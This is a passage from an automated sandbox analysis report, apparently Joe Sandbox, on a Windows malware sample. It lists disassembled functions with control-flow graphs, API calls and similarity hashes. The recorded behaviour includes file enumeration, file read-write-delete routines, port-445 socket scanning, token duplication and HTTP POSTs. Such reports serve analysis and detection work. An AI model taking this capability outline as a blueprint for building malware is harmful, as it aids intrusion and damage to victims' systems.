        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
      • FindFirstFileW.KERNEL32(00000000,?,?,00000000,-00000002,00000002), ref: 000D5DC6
      • FindNextFileW.KERNEL32(00000000,?,?,00000000,-00000002,00000002), ref: 000D5E9C
      • FindClose.KERNEL32(00000000,?,00000000,-00000002,00000002), ref: 000D5EAD
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Find$FileHeap$AllocCloseFirstNextProcess
      • String ID: .$.
      • API String ID: 719300460-3769392785
      • Opcode ID: e82861458aac04aff6942e1fb638b6e66b43abbbb90d9edfbb13a25c6581f98c
      • Instruction ID: ca7f872757c193c9f1fc3b4823bf174f84cf86aefba1a0e290b113c892b53922
      • Opcode Fuzzy Hash: e82861458aac04aff6942e1fb638b6e66b43abbbb90d9edfbb13a25c6581f98c
      • Instruction Fuzzy Hash: 05317C31801719AFCF25AFA0DC49AEE7BB9AF04316F148057FD04A2252E7758B948FB5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D4B85 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 166pipeprocessfileCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 313 d4b85-d4c21 call d3bb3 call d8fa9 * 3 call d3d4b CreatePipe 324 d4cf7-d4d01 313->324 325 d4c27-d4c3b CreatePipe 313->325 327 d4d09-d4d0d 324->327 328 d4d03-d4d07 CloseHandle 324->328 325->324 326 d4c41-d4c51 SetHandleInformation 325->326 326->324 329 d4c57-d4c61 SetHandleInformation 326->329 330 d4d0f-d4d13 CloseHandle 327->330 331 d4d15-d4d1c 327->331 328->327 329->324 332 d4c67-d4cbb CreateProcessW 329->332 330->331 333 d4d1e-d4d22 CloseHandle 331->333 334 d4d24-d4d28 331->334 332->324 337 d4cbd-d4cf3 call d90b5 WriteFile WaitForSingleObject call d3d4b 332->337 333->334 335 d4d2a-d4d2e CloseHandle 334->335 336 d4d30-d4d34 334->336 335->336 338 d4d3c-d4d40 336->338 339 d4d36-d4d3a CloseHandle 336->339 337->324 341 d4d48-d4d65 call d39da call d39f9 338->341 342 d4d42-d4d46 CloseHandle 338->342 339->338 342->341
      APIs
        • Part of subcall function 000D3D4B: GetModuleHandleA.KERNEL32(00000000,?,00000000,00000000,000D48E0,?), ref: 000D3D8C
        • Part of subcall function 000D3D4B: GetProcAddress.KERNEL32(00000000,00000001), ref: 000D3DA1
      • CreatePipe.KERNEL32(?,?,?,00000000), ref: 000D4C1D
      • CreatePipe.KERNEL32(?,?,?,00000000), ref: 000D4C37
      • SetHandleInformation.KERNEL32(?,00000001,00000000), ref: 000D4C4D
      • SetHandleInformation.KERNEL32(?,00000001,00000000), ref: 000D4C5D
      • CreateProcessW.KERNEL32 ref: 000D4CB3
      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 000D4CD4
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000D4CE0
      • CloseHandle.KERNEL32(?), ref: 000D4D07
      • CloseHandle.KERNEL32(?), ref: 000D4D13
      • CloseHandle.KERNEL32(?), ref: 000D4D22
      • CloseHandle.KERNEL32(?), ref: 000D4D2E
      • CloseHandle.KERNEL32(?), ref: 000D4D3A
      • CloseHandle.KERNEL32(?), ref: 000D4D46
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Handle$Close$Create$InformationPipe$AddressFileModuleObjectProcProcessSingleWaitWrite
      • String ID: D
      • API String ID: 4141597255-2746444292
      • Opcode ID: f6deacf10b3427b9e7d696cfd3b697b7a7d061ac9b671455a5cc3b896b5bdd07
      • Instruction ID: f20a637533992beb2091948ddde8c615c964e3c8e49abadce9934b461a644a01
      • Opcode Fuzzy Hash: f6deacf10b3427b9e7d696cfd3b697b7a7d061ac9b671455a5cc3b896b5bdd07
      • Instruction Fuzzy Hash: 56514972509341AFD751EF61DC44D9BBBE9EF85760F00492FF59882261DB34CA08CBA2
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D3EE1 Relevance: 24.2, APIs: 16, Instructions: 203libraryloaderCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 350 d3ee1-d3f14 call d6347 call d90b5 355 d3f19-d3f2e call d90b5 350->355 358 d3f16 355->358 359 d3f30-d3f39 355->359 358->355 360 d3f3e-d3f53 call d90b5 359->360 363 d3f3b 360->363 364 d3f55-d3f5e 360->364 363->360 365 d3f63-d3f78 call d90b5 364->365 368 d3f7a-d3fbd GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 365->368 369 d3f60 365->369 370 d4101-d411c CloseHandle call d39b7 368->370 371 d3fc3-d3fc6 368->371 369->365 371->370 373 d3fcc-d3fcf 371->373 373->370 375 d3fd5-d3fd8 373->375 375->370 376 d3fde-d3fe0 375->376 376->370 377 d3fe6-d4001 GetCurrentProcessId OpenProcess 376->377 377->370 378 d4007-d4015 377->378 378->370 380 d401b-d4030 ReadProcessMemory 378->380 380->370 381 d4036-d404a ReadProcessMemory 380->381 381->370 382 d4050-d4089 GetModuleFileNameW 381->382 386 d408c-d409e ReadProcessMemory 382->386 387 d40fb 386->387 388 d40a0-d40ba ReadProcessMemory 386->388 387->370 388->387 389 d40bc-d40d2 call d5999 388->389 392 d40dd-d40f4 389->392 393 d40d4-d40d9 389->393 392->387 393->386 394 d40db 393->394 394->387
      APIs
      • GetModuleHandleA.KERNEL32(00000000,00000001,74DF35B0,00000208,00000000), ref: 000D3F86
      • GetProcAddress.KERNEL32(00000000), ref: 000D3F8F
      • GetModuleHandleA.KERNEL32(00000000,?), ref: 000D3F98
      • GetProcAddress.KERNEL32(00000000), ref: 000D3F9B
      • GetModuleHandleA.KERNEL32(00000000,?), ref: 000D3FA4
      • GetProcAddress.KERNEL32(00000000), ref: 000D3FA7
      • GetModuleHandleA.KERNEL32(00000000,?), ref: 000D3FB0
      • GetProcAddress.KERNEL32(00000000), ref: 000D3FB3
      • GetCurrentProcessId.KERNEL32 ref: 000D3FE6
      • OpenProcess.KERNEL32(00000438,00000000,00000000), ref: 000D3FF3
      • ReadProcessMemory.KERNEL32(00000000,?,?,00000020,00000000), ref: 000D402C
      • ReadProcessMemory.KERNEL32(000000FF,?,?,00000030,00000000), ref: 000D4046
      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 000D407D
      • ReadProcessMemory.KERNEL32(000000FF,?,?,00000004,00000000), ref: 000D409A
      • ReadProcessMemory.KERNEL32(000000FF,?,?,?,00000000), ref: 000D40B6
      • CloseHandle.KERNEL32(000000FF), ref: 000D4104
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Process$HandleModule$AddressMemoryProcRead$CloseCurrentFileNameOpen
      • String ID:
      • API String ID: 754965762-0
      • Opcode ID: 1956b41051e142ba824791429b920631d0bfad33ad2df61e9efc09bb22c6d742
      • Instruction ID: b99fe3d8f5212d1bb1d260bd1d8de810d09084957dec64d9f8de365904331e83
      • Opcode Fuzzy Hash: 1956b41051e142ba824791429b920631d0bfad33ad2df61e9efc09bb22c6d742
      • Instruction Fuzzy Hash: C0712971D00209AFDF109BA4CC48EEEBFB8EF48314F144056FA15A2251D7799A85CFB1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D8782 Relevance: 21.3, APIs: 14, Instructions: 287fileCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 397 d8782-d87cc call d8601 call d90c6 402 d87ce-d87e1 397->402 403 d87e3-d87e7 397->403 404 d87e9-d880d GetFileAttributesW 402->404 403->404 405 d8ae9-d8af0 404->405 406 d8813-d881f GetFileAttributesW 404->406 406->405 407 d8825-d8841 CreateFileW 406->407 407->405 408 d8847-d8864 SetFilePointerEx 407->408 409 d8ab9-d8ac8 CloseHandle 408->409 410 d886a-d8870 408->410 412 d8acf-d8ad3 409->412 413 d8aca-d8acd CloseHandle 409->413 410->409 411 d8876-d8894 SetFilePointerEx 410->411 411->409 414 d889a-d88b9 CreateFileW 411->414 415 d8ada-d8ade 412->415 416 d8ad5-d8ad8 412->416 413->412 414->409 417 d88bf-d88d6 call d669b 414->417 415->405 419 d8ae0 415->419 418 d8ae3 DeleteFileW 416->418 417->409 422 d88dc 417->422 418->405 419->418 423 d8957-d896e ReadFile 422->423 424 d88de-d88e4 423->424 425 d8974 423->425 426 d890d-d8923 call d6432 424->426 427 d88e6-d890a call d8fa9 424->427 428 d8aa3-d8ab6 call d8fa9 425->428 426->428 435 d8929-d8940 WriteFile 426->435 427->426 428->409 435->428 436 d8946-d894c 435->436 436->428 437 d8952-d8955 436->437 437->423 438 d8979-d8a1a call d8fd7 * 5 call d669b 437->438 438->428 451 d8a20-d8a38 call d6432 438->451 451->428 454 d8a3a-d8a6a call d8fa9 WriteFile 451->454 454->428 457 d8a6c-d8a75 454->457 457->428 458 d8a77-d8a7b 457->458 459 d8a7d-d8a85 call d86b7 458->459 460 d8a86-d8a8a 458->460 459->460 462 d8a9c 460->462 463 d8a8c-d8a9a FlushFileBuffers * 2 460->463 462->428 463->462
      APIs
      • GetFileAttributesW.KERNEL32(?), ref: 000D87F3
      • GetFileAttributesW.KERNEL32(?), ref: 000D8816
      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 000D8835
      • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 000D885C
      • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 000D888C
      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,?,00000000), ref: 000D88AD
      • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 000D8938
      • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 000D8966
      • WriteFile.KERNEL32(00000002,00000000,?,?,00000000), ref: 000D8A62
      • FlushFileBuffers.KERNEL32(F0A75E12), ref: 000D8A95
      • FlushFileBuffers.KERNEL32(00000002), ref: 000D8A9A
        • Part of subcall function 000D86B7: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000002), ref: 000D86EA
        • Part of subcall function 000D86B7: SetFilePointerEx.KERNEL32(?,?,?,?,00000000), ref: 000D8713
        • Part of subcall function 000D86B7: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 000D8737
        • Part of subcall function 000D86B7: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 000D8766
      • CloseHandle.KERNEL32(?), ref: 000D8AC2
      • CloseHandle.KERNEL32(000000FF), ref: 000D8ACD
      • DeleteFileW.KERNEL32(?), ref: 000D8AE3
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$PointerWrite$AttributesBuffersCloseCreateFlushHandle$DeleteRead
      • String ID:
      • API String ID: 668398616-0
      • Opcode ID: 81d5fa2f547a427e7f023d064a87264ddbf47300c20edf28057c65a2422b08a1
      • Instruction ID: 8185a885c6be12d15222c71b2a53b7978764b367fa7cc0f35625ba9168489a03
      • Opcode Fuzzy Hash: 81d5fa2f547a427e7f023d064a87264ddbf47300c20edf28057c65a2422b08a1
      • Instruction Fuzzy Hash: 6DB15171A00309AFEF11DFA4CC45BEEBBB9BF04310F148566F914E6291EB359A54CB61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D5067 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 158networkCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 465 d5067-d50bd htons call d905b * 2 470 d5219-d522f call d90a1 * 2 465->470 471 d50c3-d50c8 465->471 471->470 473 d50ce-d50d0 471->473 475 d5139-d513b 473->475 476 d50d2-d50f6 htonl socket 473->476 480 d520d-d5213 475->480 481 d5141-d514d call d4fa9 475->481 478 d50f8-d510a ioctlsocket 476->478 479 d5131-d5137 476->479 478->479 483 d510c-d511b connect 478->483 479->473 479->475 480->470 480->471 488 d514e-d515b 481->488 485 d511d-d5128 WSAGetLastError 483->485 486 d512a-d5130 483->486 485->479 485->486 486->479 489 d51e1-d51eb closesocket 488->489 490 d5161-d5184 getsockopt 488->490 489->488 492 d51f1 489->492 490->489 491 d5186-d5189 490->491 491->489 493 d518b-d51a0 recv 491->493 494 d5207-d520b 492->494 495 d51ab-d51ad 493->495 496 d51a2-d51a8 WSAGetLastError 493->496 494->480 497 d51f3-d5205 call d2084 494->497 498 d51af-d51b6 495->498 499 d51b8-d51db getpeername 495->499 496->495 497->470 497->494 498->499 501 d51de 498->501 499->501 501->489
      APIs
      • htons.WS2_32(000001BD), ref: 000D5085
        • Part of subcall function 000D905B: GetProcessHeap.KERNEL32(00000008,00000000,000D92F9,00000001,00000002,00000000,00000000,000D3BCD,00000000,00000000,00000000,00000000,?,?,?,000D3C8D), ref: 000D906C
        • Part of subcall function 000D905B: HeapAlloc.KERNEL32(00000000,?,000D3C8D,00000017,00000000,00000000,?,?,?,000D28D8,00000000,00000000,00000000), ref: 000D9073
      • htonl.WS2_32(00000000), ref: 000D50DB
      • socket.WS2_32(00000002,00000001,00000006), ref: 000D50EC
      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 000D5102
      • connect.WS2_32(00000000,?,00000010), ref: 000D5113
      • WSAGetLastError.WS2_32 ref: 000D511D
      • getsockopt.WS2_32(?,0000FFFF,00001007,?,?), ref: 000D517C
      • recv.WS2_32(?,?,00000001,00000002), ref: 000D5195
      • WSAGetLastError.WS2_32 ref: 000D51A2
      • getpeername.WS2_32(?,?,?), ref: 000D51C9
      • closesocket.WS2_32(?), ref: 000D51E3
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: ErrorHeapLast$AllocProcessclosesocketconnectgetpeernamegetsockopthtonlhtonsioctlsocketrecvsocket
      • String ID: w"
      • API String ID: 1659685214-2013044058
      • Opcode ID: c98d043cb8c4964ae24208a461406a895a36f649540b478dc0edb799f3068f91
      • Instruction ID: 1f79f1e6cc16049cba9c48606fe9863a97fd39cb85c8cf88c90cc981ac43c055
      • Opcode Fuzzy Hash: c98d043cb8c4964ae24208a461406a895a36f649540b478dc0edb799f3068f91
      • Instruction Fuzzy Hash: 8C514F75E01709AFEF219FA4DC85BEEBBB4EF05311F10012AEE00A6251D7755A45CBA1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D49D3 Relevance: 19.7, APIs: 13, Instructions: 160libraryloaderthreadCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 503 d49d3-d4a5b call d6347 call d90b5 call d9041 GetVersion call d8fa9 512 d4b3a-d4b3d 503->512 513 d4a61-d4a83 call d3d4b GetModuleHandleA GetProcAddress 503->513 515 d4b3f-d4b42 CloseHandle 512->515 516 d4b44-d4b47 512->516 522 d4a89-d4a8c 513->522 523 d4b24-d4b33 call d3d4b 513->523 515->516 517 d4b4e-d4b51 516->517 518 d4b49-d4b4c CloseHandle 516->518 520 d4b58-d4b5b 517->520 521 d4b53-d4b56 CloseHandle 517->521 518->517 524 d4b5d-d4b60 CloseHandle 520->524 525 d4b62-d4b65 520->525 521->520 522->523 527 d4a92-d4a9d call d5b0e 522->527 523->512 535 d4b35-d4b38 CloseHandle 523->535 524->525 528 d4b67-d4b6f call d90a1 525->528 529 d4b70-d4b84 call d39b7 525->529 527->523 536 d4aa3-d4aab GetShellWindow 527->536 528->529 535->512 536->523 539 d4aad-d4aba GetWindowThreadProcessId 536->539 539->523 540 d4abc-d4ad0 OpenProcess 539->540 540->523 541 d4ad2-d4ae5 OpenProcessToken 540->541 541->523 542 d4ae7-d4b06 DuplicateTokenEx 541->542 542->523 543 d4b08-d4b21 542->543 543->523
      APIs
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
      • GetVersion.KERNEL32(00000000,?,00000000), ref: 000D4A12
      • GetModuleHandleA.KERNEL32(?,00000001), ref: 000D4A71
      • GetProcAddress.KERNEL32(00000000), ref: 000D4A78
      • CloseHandle.KERNEL32(?), ref: 000D4B38
        • Part of subcall function 000D5B0E: GetModuleFileNameW.KERNEL32(00000000,?,00000104,000D5B3B,00000000,00000000,00000000,000D37EB,00000000), ref: 000D5B19
      • GetShellWindow.USER32 ref: 000D4AA3
      • GetWindowThreadProcessId.USER32(00000000,?), ref: 000D4AB2
      • OpenProcess.KERNEL32(00000400,00000000,?), ref: 000D4AC5
      • OpenProcessToken.ADVAPI32(00000000,02000000,000D2B94), ref: 000D4ADD
      • DuplicateTokenEx.ADVAPI32(000D2B94,02000000,?,00000002,00000001,?), ref: 000D4AFE
      • CloseHandle.KERNEL32(?), ref: 000D4B42
      • CloseHandle.KERNEL32(?), ref: 000D4B4C
      • CloseHandle.KERNEL32(000D2B94), ref: 000D4B56
      • CloseHandle.KERNEL32(?), ref: 000D4B60
        • Part of subcall function 000D3D4B: GetModuleHandleA.KERNEL32(00000000,?,00000000,00000000,000D48E0,?), ref: 000D3D8C
        • Part of subcall function 000D3D4B: GetProcAddress.KERNEL32(00000000,00000001), ref: 000D3DA1
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Handle$Close$Process$Module$AddressHeapOpenProcTokenWindow$AllocDuplicateFileNameShellThreadVersion
      • String ID:
      • API String ID: 4248481622-0
      • Opcode ID: bdca433c38abbd5b4a8e6381d91225eb7c556e5c927e7eb4ce01b4a4ba25d818
      • Instruction ID: ecd588b544679c0aa433c2ac8aa7139072c43d2cdb06b874dcd07053dbb375a7
      • Opcode Fuzzy Hash: bdca433c38abbd5b4a8e6381d91225eb7c556e5c927e7eb4ce01b4a4ba25d818
      • Instruction Fuzzy Hash: 15513771D01218AFEB11AFA0DC49AEEBFB9EF09721F100067F504B2250D7759A45CBB5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D4428 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109memoryCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 545 d4428-d445e GetCurrentProcess OpenProcessToken 546 d452b-d452e 545->546 547 d4464-d4496 GetTokenInformation call d9041 GetTokenInformation 545->547 548 d4539-d453b 546->548 549 d4530-d4533 FreeSid 546->549 554 d449c-d44bb AllocateAndInitializeSid 547->554 555 d452a 547->555 552 d453d-d4543 call d90a1 548->552 553 d4544-d454a 548->553 549->548 552->553 554->555 558 d44bd-d44c1 554->558 555->546 558->555 559 d44c3-d44c6 558->559 560 d44c9-d44d9 EqualSid 559->560 561 d44db-d44e2 560->561 562 d44e6-d4514 LookupAccountSidW 560->562 561->560 563 d44e4 561->563 564 d4516-d4521 GetLastError 562->564 565 d4523 562->565 563->555 564->555 564->565 565->555
      APIs
      • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000000), ref: 000D444F
      • OpenProcessToken.ADVAPI32(00000000), ref: 000D4456
      • GetTokenInformation.ADVAPI32(?,00000002,00000000,}I,}I,00000000), ref: 000D4478
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 000D4492
      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 000D44B3
      • EqualSid.ADVAPI32(?,?), ref: 000D44D1
      • LookupAccountSidW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 000D450C
      • GetLastError.KERNEL32 ref: 000D4516
      • FreeSid.ADVAPI32(?), ref: 000D4533
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: ProcessToken$HeapInformation$AccountAllocAllocateCurrentEqualErrorFreeInitializeLastLookupOpen
      • String ID: }I
      • API String ID: 1407196647-4234324704
      • Opcode ID: d528a0f058271ffbd2a248d0de7c31f66254eb8b9fa8accef46e016abbc01acc
      • Instruction ID: 3e504a16501d441cce81c61b46f6069f56e9c17c00673d98f4499aeb285f5b50
      • Opcode Fuzzy Hash: d528a0f058271ffbd2a248d0de7c31f66254eb8b9fa8accef46e016abbc01acc
      • Instruction Fuzzy Hash: A831F872A01209BBEB51DF94EC88EEEBBBCFB08341F10406BE601E2151D7759E859B65
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D3CBD Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 566 d3cbd-d3cde WinHttpOpen 567 d3d45-d3d4a 566->567 568 d3ce0-d3cf8 WinHttpConnect 566->568 569 d3d3f-d3d44 WinHttpCloseHandle 568->569 570 d3cfa-d3d12 WinHttpOpenRequest 568->570 569->567 571 d3d39-d3d3e WinHttpCloseHandle 570->571 572 d3d14-d3d29 WinHttpSendRequest 570->572 571->569 573 d3d2b-d3d33 WinHttpReceiveResponse 572->573 574 d3d36-d3d37 WinHttpCloseHandle 572->574 573->574 574->571
      APIs
      • WinHttpOpen.WINHTTP(000DA3C0,00000001,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 000D3CD3
      • WinHttpConnect.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 000D3CE7
      • WinHttpOpenRequest.WINHTTP(00000000,POST,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000), ref: 000D3D08
      • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,?,?,?,00000000,?,?,?,00000000,00000000,00000000), ref: 000D3D21
      • WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 000D3D2D
      • WinHttpCloseHandle.WINHTTP(00000000,?,?,?,00000000,00000000,00000000), ref: 000D3D37
      • WinHttpCloseHandle.WINHTTP(?,?,?,?,00000000,00000000,00000000), ref: 000D3D3C
      • WinHttpCloseHandle.WINHTTP(?,?,?,?,00000000,00000000,00000000), ref: 000D3D42
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Http$CloseHandle$OpenRequest$ConnectReceiveResponseSend
      • String ID: POST$t.
      • API String ID: 4150888541-3436230425
      • Opcode ID: 826785941c26b38ba9ea6577ded8b7ac4109db16c4bceacbad2106a7102adad4
      • Instruction ID: 82f7a30bd13be081f2fd8e2893e57a0ad4fbf9a19201ace76c67f32ed52e725f
      • Opcode Fuzzy Hash: 826785941c26b38ba9ea6577ded8b7ac4109db16c4bceacbad2106a7102adad4
      • Instruction Fuzzy Hash: 6F11D235602228BBDB215F629C4CCDF7F7DEF477A0B104416F905A2210D6398A10DAB2
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D454B Relevance: 16.8, APIs: 11, Instructions: 256filelibraryloaderCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 000D3C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,000D28D8,00000000,00000000), ref: 000D3CA2
        • Part of subcall function 000D3A18: RegOpenKeyExW.ADVAPI32(00000002,00000000,00000000,00020119,00000000,00000000,00000000,80000002,00000000,00000002,?), ref: 000D3A44
